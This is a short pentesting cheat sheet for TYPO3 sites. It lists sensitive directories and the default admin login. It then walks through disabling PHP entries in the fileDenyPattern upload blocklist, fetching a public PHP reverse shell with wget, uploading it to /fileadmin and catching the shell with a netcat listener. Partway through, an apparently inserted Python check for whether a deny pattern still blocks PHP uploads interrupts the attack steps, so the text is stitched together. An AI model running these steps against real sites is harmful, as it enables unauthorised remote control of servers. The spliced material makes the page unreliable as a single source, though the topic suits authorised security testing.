TYPO3 Pentesting

TYPO3 is a web content management system. It can run on web servers like Apache, Nginx or IIS.

Directory Discovery

/fileadmin/
/typo3/
/typo3conf/
/typo3temp/


Default Credentials

admin:<password-specified-when-installed>


Reverse Shell (Admin Credential Required)

First, check which upload file extensions the backend refuses and edit the setting if needed: go to “ADMIN TOOLS” → “Configure Installation-Wide Options” → “Backend” → “fileDenyPattern”. This setting is the regular expression TYPO3 matches against uploaded file names; a name that matches is rejected.
Update the configuration if necessary. For example, remove “php[1-9]?” from the pattern, which leaves:

\.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$
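The pattern above is what remains once the “php[1-9]?” alternative is taken out. To see what that change does to the upload blocklist, here is an added configuration check, not code from the page or from TYPO3 itself: it applies a fileDenyPattern to a constructed set of file names and reports which ones would be accepted. The baseline pattern is reconstructed by putting the removed alternative back into the weakened pattern shown on the page (an assumption, not copied from a TYPO3 release), and the case-insensitive match mirrors the “/i” flag TYPO3 is assumed to use on this setting. A defender can run the same check against the pattern exported from a live installation to confirm that plain and double-extension PHP names are still denied.

```python
import re

# Pattern exactly as the page shows it after weakening (no "php[1-9]?" alternative).
WEAKENED_FILE_DENY_PATTERN = r"\.(phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$"

# Baseline reconstructed by restoring the alternative the page says to remove.
# Assumption for this example; verify against your own TYPO3 version's default.
BASELINE_FILE_DENY_PATTERN = r"\.(php[1-9]?|phpsh|phtml|pht|phar|shtml|cgi)(\..*)?$|\.pl$|^\.htaccess$"

# Constructed sample of upload names: plain, double-extension, mixed case,
# and a few harmless ones. Not taken from any real installation.
SAMPLE_FILENAMES = [
    "shell.php",
    "shell.php.txt",
    "SHELL.PHP",
    "shell.phtml",
    "script.pl",
    ".htaccess",
    "report.pdf",
    "image.jpg",
]


def is_denied(filename: str, pattern: str = BASELINE_FILE_DENY_PATTERN) -> bool:
    """True when the file name matches the deny pattern.

    TYPO3 is assumed to match with the /i flag, so the check is
    case-insensitive; the pattern is applied to the bare file name.
    """
    return re.search(pattern, filename, re.IGNORECASE) is not None


def allowed_uploads(pattern: str, filenames=SAMPLE_FILENAMES) -> list:
    """Names from the sample that the given pattern would let through."""
    return [name for name in filenames if not is_denied(name, pattern)]


def pattern_blocks_php(pattern: str) -> bool:
    """Sanity check for a configured pattern: plain .php, upper-case .PHP and a
    double-extension .php.txt name must all be denied."""
    probes = ("x.php", "x.PHP", "x.php.txt")
    return all(is_denied(name, pattern) for name in probes)


if __name__ == "__main__":
    for label, pattern in (("baseline", BASELINE_FILE_DENY_PATTERN),
                           ("weakened", WEAKENED_FILE_DENY_PATTERN)):
        print(f"{label}: blocks PHP = {pattern_blocks_php(pattern)}; "
              f"allowed = {allowed_uploads(pattern)}")
```

The double-extension probe matters because the deny pattern anchors on the end of the name only after an optional trailing “.anything” group; a pattern that blocks “x.php” but not “x.php.txt” still leaves room for server-side handler mismatches, so the check treats both the same way.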

Next, prepare the payload for reverse shell named “shell.php”.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

Go to “FILE” → “Filelist” and upload the payload to the root of /fileadmin.
Now open a listener to receive the shell.

nc -lvnp 4444

Then access “/fileadmin/shell.php”. You should get the shell.